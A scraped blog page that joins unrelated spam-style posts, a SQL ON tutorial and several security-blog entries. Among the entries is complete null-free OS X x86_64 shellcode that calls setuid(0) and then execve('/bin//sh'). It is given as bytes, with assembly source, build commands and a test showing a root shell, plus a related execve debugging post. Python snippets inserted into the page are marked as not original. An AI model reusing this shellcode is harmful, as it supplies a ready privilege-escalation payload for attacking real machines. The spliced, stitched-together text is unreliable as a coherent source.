Are Perfect Teeth Necessary for Beauty

Dental work is a nightmare for most people, but the United States remains one of the most dental-oriented societies in the world. There’s a very real social pressure to have the best and brightest white teeth regardless of where you may live in America. The idea of having perfect teeth saturates our culture and is one of the driving points of attractiveness; if not the one defining feature that seems to be shared in the multiple interpretations of what we believe beauty to be as Americans. Have you visited your dentist in Grand Rapids? If not, I bet you feel guilty right now for doing so after being so shamelessly reminded that the beauty equation ends and begins with your teeth. It’s something that I’ve struggled with for years because I don’t have straight teeth. There are very few women who are going to find it endearing, and only a handful of women I have dated have thought that it was an attractive part of my features.

There’s nothing at all wrong with having great teeth. (more…)

Choosing a Good Web Design Team for Your Business

I remember building my first website as a young man. It was fun to spend all those hours learning how to do it. My main motivation was to show off for friends and family. I built a bunch of websites that were very basic, but they looked like masterpieces to people who knew nothing about the Internet or websites. I am very embarrassed about my efforts. I never went anywhere with it even though I considered I might make it a career back then. The company I own as an adult uses a firm that does website design in Michigan. I could not even begin to build anything now. I barely even remember a couple of basic HTML tags.

The point I am making is that we should leave some things to professionals. We should consult with people who have a proven track record of performance. I remember the early days of the Internet, when small business owners were allowing employees or relatives with some web experience to build them an online presence. That never was a good idea. (more…)

Server Management for New Business Website

It has taken a lot of work and dedication from a couple of my employees, but the new website for our company is finally ready to be launched. It is a day that I have looked forward to, because this has been a long time in the making and I have worried that it would not turn out as intended. We need to hire server management for the new website though, because I do not want my employees to have to worry about keeping the website running. They have other things to attend to, and I feel like too much of their time has already been devoted to this project, to expect them to put more time into it going forward.

The real vision of the new website was what took so much effort to develop. (more…)

My Wife Figured out What Would Help

I had tried a couple of things trying to fix the trouble I was having with my neck and back. I was at my wit’s end. I was not really sure what else to do. My wife said that I should try a Hitachi wand massager to see if that would do anything for me. I had not thought about that previously, but was not really sure it would do me any good. I told her I would try it if things grew worse.

I first went to my doctor when I began having pain. The pain had been going on for at least three weeks. I even spent about three of those days in bed near the end of those three weeks. I could barely move because I hurt so much. I knew that I could not take any time off of work, so quickly made the doctor’s appointment. My doctor said that I probably strained my back at work because I do heavy lifting. (more…)

Thinking About Dumping My Cable Tv

Thinking about dumping my cable TV, but I am not sure what would be the best thing to do instead. Of course I watch a lot of live sports, and that is the thing that really keeps people from cutting the cable on Time Warner and Comcast and those other pirates. Everything else you can get off the internet, or you can get yourself a Digital Video Recorder like the Direct TV Genie and record it, then play it back and skip through the ads. Obviously that sort of defeats the whole purpose of most TV programs. (more…)

SQL ON

The SQL ON clause is used in JOIN queries when the information is located in different tables: it lets you join related tables by specifying a condition that involves a key field identifying the records in both tables. The key field contains data that is found in the first table and in the second table, and therefore both tables are related by this key field. It is optional to have these fields defined as a FOREIGN KEY between the two tables; what is essential is that there are two fields whose data identify the records in both tables.

Following is the general syntax for the SQL ON clause with two tables, using a JOIN query:

SELECT fieldNames FROM table_1 AS one
     JOIN table_2 AS two
     ON one.field = two.field

When the type of JOIN (INNER, LEFT, RIGHT) is not specified, the default is INNER JOIN, which returns a record only when it meets the JOIN condition given in the ON operator.

In the following example we use the AdventureWorks database to get the name of the territory for each customer. The required information is contained in the tables Sales.Customer and Sales.SalesTerritory; the field that serves as the JOIN condition is TerritoryID, which is used in the SQL ON operator. This field allows us to relate data from both tables. In the table definition, Sales.Customer has a FOREIGN KEY to the Sales.SalesTerritory table.

In the query result we get the ID, customer type and account number from the Sales.Customer table, and the name of the territory from the Sales.SalesTerritory table. The JOIN syntax is as follows:

SELECT C.CustomerID, C.CustomerType, C.AccountNumber, T.Name
FROM Sales.SalesTerritory AS T
INNER JOIN Sales.Customer AS C
ON T.TerritoryID = C.TerritoryID

As we see, the INNER JOIN operator names the second table, where the additional information is found; then, in the JOIN condition, we use the SQL ON operator with the field that joins the information from the two tables. The image shows the output of the query:
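To make the INNER versus LEFT JOIN behaviour concrete, here is an added Python example (not part of the original post) that runs the post's query against constructed rows shaped like Sales.SalesTerritory and Sales.Customer in an in-memory SQLite database; an attached database named Sales stands in for the AdventureWorks schema, and the sample rows are made up for the demonstration.

```python
import sqlite3

# Constructed sample rows shaped like the two AdventureWorks tables the post
# joins; they are not the real AdventureWorks data.
TERRITORIES = [(1, "Northwest"), (2, "Northeast"), (3, "Central")]
CUSTOMERS = [
    (1, "S", "AW00000001", 1),
    (2, "I", "AW00000002", 1),
    (3, "S", "AW00000003", 3),
    (4, "I", "AW00000004", None),  # customer with no territory assigned
]

# The post's query, unchanged apart from an ORDER BY for stable output.
JOIN_QUERY = """
SELECT C.CustomerID, C.CustomerType, C.AccountNumber, T.Name
FROM Sales.SalesTerritory AS T
INNER JOIN Sales.Customer AS C
ON T.TerritoryID = C.TerritoryID
ORDER BY C.CustomerID
"""

def build_db():
    conn = sqlite3.connect(":memory:")
    # An attached in-memory database named Sales gives SQLite the
    # schema-qualified names Sales.Customer and Sales.SalesTerritory.
    conn.execute("ATTACH DATABASE ':memory:' AS Sales")
    conn.execute("CREATE TABLE Sales.SalesTerritory ("
                 "TerritoryID INTEGER PRIMARY KEY, Name TEXT NOT NULL)")
    # The FOREIGN KEY mirrors AdventureWorks but, as the post says, the
    # join only needs the two TerritoryID columns, not the constraint.
    conn.execute("CREATE TABLE Sales.Customer ("
                 "CustomerID INTEGER PRIMARY KEY, CustomerType TEXT, "
                 "AccountNumber TEXT, TerritoryID INTEGER "
                 "REFERENCES SalesTerritory(TerritoryID))")
    conn.executemany("INSERT INTO Sales.SalesTerritory VALUES (?, ?)", TERRITORIES)
    conn.executemany("INSERT INTO Sales.Customer VALUES (?, ?, ?, ?)", CUSTOMERS)
    return conn

def run_join(join_type="INNER"):
    """Run the post's query with INNER (the default) or LEFT in place of INNER."""
    if join_type not in ("INNER", "LEFT"):
        raise ValueError("join_type must be INNER or LEFT")
    query = JOIN_QUERY.replace("INNER JOIN", join_type + " JOIN")
    with build_db() as conn:
        return conn.execute(query).fetchall()

if __name__ == "__main__":
    for kind in ("INNER", "LEFT"):
        print(kind, run_join(kind))
```

The INNER JOIN drops customer 4 (NULL TerritoryID never satisfies the ON condition), while the LEFT JOIN additionally keeps the Northeast territory with NULL customer columns because it is on the left side and has no matching customer.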


T-Mobile 4G Hotspot Multiple Vulnerabilities

About

Create your own personal hotspot on the go with the T-Mobile 4G Mobile Hotspot—get high-speed Internet on up to five Wi-Fi devices, using a single mobile broadband connection.

Link to Product on T-Mobile’s Website

Timeline

  • Reported to T-Mobile and ZTE on 4/14/12.
  • Received notification from T-Mobile on 4/17/12 that the vulnerabilities would be forwarded to their security team for review.
  • Received no meaningful response from ZTE.
  • No fixes provided, disclosure 2/21/13

Device: T-Mobile 4G Mobile Hotspot ZTE MF61

The access point broadcasts as ‘T-Mobile Broadband#’ where # changes per device.

(more…)

My Plea to Oracle: Axe Java Applets

Hi Oracle,

We’ve got a bit of problem: applets.

You see, almost every recent security vulnerability and recent hack – Facebook, Apple, NYT – has been because of your support for applets.

Just to name a few, there’s CVE-2012-3213, CVE-2012-3342, CVE-2013-0351, CVE-2013-0409, CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426, CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0432, CVE-2013-043, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438, CVE-2013-0440, CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445, CVE-2013-0450, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476, CVE-2013-1478, CVE-2013-1480, CVE-2013-1481, CVE-2013-1486, CVE-2013-1487, CVE-2013-1488.

I’ve been developing in Java for many years and I can attest that nobody uses applets anymore. It’s old, outdated technology that needs to go away. It’s too heavy a platform for delivering web applications. The future of web technology is lightweight. The future is HTML5, JavaScript, and CSS3.

We all make mistakes and nobody is going to blame you (except maybe the malware authors) for getting rid of applets.

Do it! Axe it!

Sincerely,
Security Enthusiast and Java Developer
Dustin Schultz

Java Facepalm

It’s been a while since I’ve blogged, but I couldn’t resist with the latest Java vulnerability. I saw the proof of concept code posted by jduck last night (here) and thought it looked like normal Java code to me (I develop in Java at my day job). Well, it turns out… this is normal Java code!

(more…)

50 Byte x86_64 OS X setuid execve Null Free Shellcode

More small shellcode; this time, tested and verified working on OS X 10.7.

Shellcode

/*
 * Name: setuid_shell_x86_64
 * Qualities: Null-Free
 * Platforms: Mac OS X 10.7 Intel x86_64
 *
 *  Created on: Apr 12, 2012
 *      Author: Dustin Schultz - TheXploit.com
 */
char shellcode[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x48\xbf\x2f\x62"
"\x69\x6e\x2f\x2f\x73\x68\x52\x57\x48\x89\xe7\x52\x57\x48\x89\xe6"
"\x0f\x05";

Source

; File: setuid_shell_x86_64.asm
; Author: Dustin Schultz - TheXploit.com
BITS 64

section .text
global start

start:
mov r8b, 0x02                   ; Unix class system calls = 2
shl r8, 24                      ; shift left 24 to the upper order bits
or r8, 0x17                     ; setuid = 23, or with class = 0x2000017
xor edi, edi                    ; zero out edi, uid = 0
mov rax, r8                     ; syscall number in rax
; mov rax, 0x2000017
syscall                         ; invoke kernel: setuid(0)
add r8, 0x24                    ; 0x24+r8=0x200003b (execve = 59)
mov rax, r8                     ; syscall number in rax
xor rdx, rdx                    ; zero out rdx: envp = NULL, also used as null terminator
; mov rax, 0x200003b
mov rdi, 0x68732f2f6e69622f     ; /bin//sh in hex (little-endian)
push rdx                        ; push backwards, null terminator for the string
push rdi                        ; the /bin//sh bytes themselves
mov rdi, rsp                    ; rdi = pointer to null terminated /bin//sh (path)
push rdx                        ; argv[1] = NULL
push rdi                        ; argv[0] = pointer to /bin//sh
mov rsi, rsp                    ; rsi = argv
syscall                         ; invoke kernel: execve(path, argv, envp)

To test:

dustin@sholtz:~/$ nasm -f macho64 shell.s 
dustin@sholtz:~/$ ld -static -arch x86_64 shell.o
dustin@sholtz:~/$ ./a.out
bash-3.2# 

Bytes from otool:

dustin@sholtz:~/$ otool -t a.out 
a.out:
(__TEXT,__text) section
0000000100000f86 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0 
0000000100000f96 0f 05 49 83 c0 24 4c 89 c0 48 31 d2 48 bf 2f 62 
0000000100000fa6 69 6e 2f 2f 73 68 52 57 48 89 e7 52 57 48 89 e6 
0000000100000fb6 0f 05 

Enjoy!

Execve Syscall on OSX 10.7

I’m getting some strange behavior with shellcode that used to work on OS X 10.6. I noticed that if I don’t link with the “-static” option, I get a segfault.

; File: shell.s
; Author: Dustin Schultz - TheXploit.com
BITS 64

section .text
global start

start:
xor rdx, rdx
mov eax, 0x200003b
mov rdi, 0x68732f2f6e69622f
push rsi
push rdi
mov rdi, rsp
syscall

With static:

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -static -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
dustin@sholtz:/Users/dustin$ exit

Without static

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
Segmentation fault: 11
dustin@sholtz:~$ 

otool has the same output:

dustin@sholtz:~$ otool -tv static 
static:
(__TEXT,__text) section
start:
0000000100000fe7	xorq	%rdx,%rdx
0000000100000fea	movl	$0x0200003b,%eax
0000000100000fef	movq	$0x68732f2f6e69622f,%rdi
0000000100000ff9	pushq	%rsi
0000000100000ffa	pushq	%rdi
0000000100000ffb	movq	%rsp,%rdi
0000000100000ffe	syscall
dustin@sholtz:~$ otool -tv non-static 
non-static:
(__TEXT,__text) section
start:
0000000100000f9f	xorq	%rdx,%rdx
0000000100000fa2	movl	$0x0200003b,%eax
0000000100000fa7	movq	$0x68732f2f6e69622f,%rdi
0000000100000fb1	pushq	%rsi
0000000100000fb2	pushq	%rdi
0000000100000fb3	movq	%rsp,%rdi
0000000100000fb6	syscall

The headers on the files look way different but I’m not sure exactly what is causing the issue. For instance, the non-static version has several more Load commands like LC_LOAD_DYLINKER (which is expected).

Update
As pointed out in the comments, I was not initializing rsi correctly! Thanks for pointing that out. The fix was to add this before the last syscall:

push rdx
push rdi
mov rsi, rsp

Finding the syscall implementations in OS X

This is mainly just a little note for myself. Sometimes when I’m writing shellcode, I’m interested in how OS X implements the syscalls internally. It’s easy to find out with a command like this:

dustin@sholtz:~$ otool -tv /usr/lib/system/libsystem_kernel.dylib | grep -A10 execve
___mac_execve:
0000000000016898	movl	$0x0200017c,%eax
000000000001689d	movq	%rcx,%r10
00000000000168a0	syscall
00000000000168a2	jae	0x000168a9
00000000000168a4	jmp	0x00017ffc
00000000000168a9	ret
00000000000168aa	nop
00000000000168ab	nop
___mac_get_fd:
00000000000168ac	movl	$0x02000184,%eax
--
_execve:
00000000000173e0	movl	$0x0200003b,%eax
00000000000173e5	movq	%rcx,%r10
00000000000173e8	syscall
00000000000173ea	jae	0x000173f1
00000000000173ec	jmp	0x00017ffc
00000000000173f1	ret
00000000000173f2	nop
00000000000173f3	nop
_fchdir:
00000000000173f4	movl	$0x0200000d,%eax
dustin@sholtz:~$ 

This will find the execve syscall stub. I still haven’t figured out where the parameters are getting set up, but this is definitely where the syscall number is getting moved into rax. It moves whatever was in rcx into r10 because rcx gets smashed when syscall is invoked (the x86_64 syscall ABI passes the fourth argument in r10 instead of rcx for that reason).
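The two pieces above fit together: the shellcode builds its syscall numbers as (class << 24) | number, and the libsystem_kernel stubs load exactly such numbers into eax. Here is an added Python checker (not part of the original posts) that parses a constructed excerpt in the otool -tv format from the listing above, recovers each stub's syscall number and splits it into class and number, and confirms the 50-byte payload's null-free property; the excerpt and the regular expressions are mine.

```python
import re

# Constructed excerpt in the format of the post's `otool -tv` listing of
# libsystem_kernel.dylib (only the stubs shown in the post are reproduced).
OTOOL_OUTPUT = """\
___mac_execve:
0000000000016898    movl    $0x0200017c,%eax
_execve:
00000000000173e0    movl    $0x0200003b,%eax
00000000000173e5    movq    %rcx,%r10
00000000000173e8    syscall
_fchdir:
00000000000173f4    movl    $0x0200000d,%eax
"""

# 50-byte shellcode from the post, as a bytes literal.
SHELLCODE = (
    b"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
    b"\x0f\x05\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x48\xbf\x2f\x62"
    b"\x69\x6e\x2f\x2f\x73\x68\x52\x57\x48\x89\xe7\x52\x57\x48\x89\xe6"
    b"\x0f\x05"
)

SYMBOL_RE = re.compile(r"^(\w+):\s*$")
EAX_LOAD_RE = re.compile(r"movl\s+\$0x([0-9a-fA-F]+),%eax")

def parse_syscall_stubs(text):
    """Map each stub label to the syscall number its first movl puts in eax."""
    stubs, label = {}, None
    for line in text.splitlines():
        m = SYMBOL_RE.match(line)
        if m:
            label = m.group(1)
            continue
        m = EAX_LOAD_RE.search(line)
        if m and label and label not in stubs:
            stubs[label] = int(m.group(1), 16)
    return stubs

def split_xnu_syscall(number):
    """XNU x86_64 puts the class in the top byte: number = (class << 24) | num."""
    return number >> 24, number & 0xFFFFFF

def build_xnu_syscall(cls, num):
    """Same construction the shellcode performs with mov r8b / shl r8,24 / or r8."""
    return (cls << 24) | num

def is_null_free(code):
    """The post's 'Null-Free' quality: no 0x00 byte anywhere in the payload."""
    return b"\x00" not in code
```

Running parse_syscall_stubs over the real `otool -tv` output of libsystem_kernel.dylib gives an inventory of stub-to-syscall-number mappings for the whole library, not just the two shown here.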

Book Review: Practical Malware Analysis

I’ve been dying to get this review out for a while now. There’s so much good and deep content in this book that reading it on nights after work and on weekends took longer than expected! I’ll tell you now that if you’re into computers and computer security, this book won’t let you down. This book is like having your very own personal malware analysis teacher without the expensive training costs.

About the Book

The book material is exhaustively complete, with 21 chapters plus appendices covering everything from static analysis, environment setup and x86 assembly to anti-disassembly and anti-virtual-machine practices. Total book content, minus lab solutions, comes in at an enormous 475 pages (with lab solutions, 732 pages). Let’s just say that you had better be prepared to eat, breathe, and live malware analysis for quite some time. The skill level for the book is targeted at someone with experience in programming and security, although an ambitious beginner should do fine. (more…)

Half way through Practical Malware Analysis

I’m about half way through Practical Malware Analysis and let me just say … this book is awesome! Quote me on this: I guarantee this book will go down in history as one of the best in its class. Look out for my full review!

Book Review: Hacking and Securing iOS Applications

About the Book

Hacking and Securing iOS Applications is a recently released book by Jonathan Zdziarski. This book aims to teach you how to

  • Compromise an iOS device
  • Steal the filesystem of an iOS device
  • Abuse the Objective-C runtime
  • Defeat iOS built-in encryption
  • Protect your own applications

and much, much, more! The book comes in at just shy of 400 pages. Each chapter is broken into a specific topic and builds on previous chapters. However, there are a few chapters which are self contained and could be read without prior knowledge (e.g. Chapter 13 – Jailbreak Detection).

Audience, Skill Level, & Prereqs

This book is targeted at app developers and the how-does-iOS-work-and-how-can-I-manipulate-it type of person (I try not to use the term “Hacker”). Jonathan also uses the term tinkerers – I like that one too!
(more…)
